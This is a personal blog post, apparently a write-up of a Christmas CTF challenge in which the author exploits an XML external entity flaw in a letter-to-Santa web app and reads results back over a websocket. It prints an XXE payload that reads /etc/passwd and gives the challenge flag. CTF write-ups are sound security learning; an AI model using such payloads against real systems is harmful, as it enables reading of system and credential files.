Damjan Cvetko

Damjan Cvetko

Developer, System Architect, Hacker.

Xmas CTF 2020 - Day 16

2 minutes read

Challenge: It’s nearly Christmas and Santa’s very busy getting everything ready. He’s preparing his list of who’s been good. Write a letter to Santa, to let him know that you have been nice.

You can send him a letter at: http://elfs.owasp.si:3333/

This was a very nice task, I really liked id, if it weren’t for…

When the challenge opened at 01:00 the application immediately crashed. I don’t know why or who, but somebody somehow brute forced it to the point of unresponsiveness. It stayed that way until morning, it happened during the day a few times and I had to ask the organizers to restart the Docker a few times.

There is a lot of goodness to be found in this one. If we SEND something, we can see it gets XML encoded:

We can also see it’s an express application…

So typical XML web challenges are about XXE (XML external entity). Reading up on that a bit, you can ask the xml parser (if it’s miss configured) to read an external file and inject that into the output.

In our case:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <msg>TEST&xxe;</msg>

But in order to actually see this output, the app would need to send it back to us.. Here we just get

{"status":"OK"}

Looking around the application a bit more, we find a JS include (client.js), that does nothing:

(function () {
  // TODO Implement WebSocket client
  // ws = new WebSocket(`ws://${location.host}`);
  // ...
})();

Could it be, that the app has a websocket server?

Just typing this into console, let’s us see what happens.

So we have our attack vector. It was easy to list contents of files like /dev/random, /etc/passwd even a bunch of things under /proc/self. But I could not find a way to LIST te files on the disk in order to find the flag. If it were PHP, then we could probably use filters to do remote execution. I then just guessed and found the answer.

I have to add that when writing up this, the application was even more unresponsive than back then.

Flag: xmas{S3nd_XX3_L3tt3R_t0_S@nTa}

What did I learn: Reviewed my understanding of why XML is evil.

Recent posts

See more

Categories

About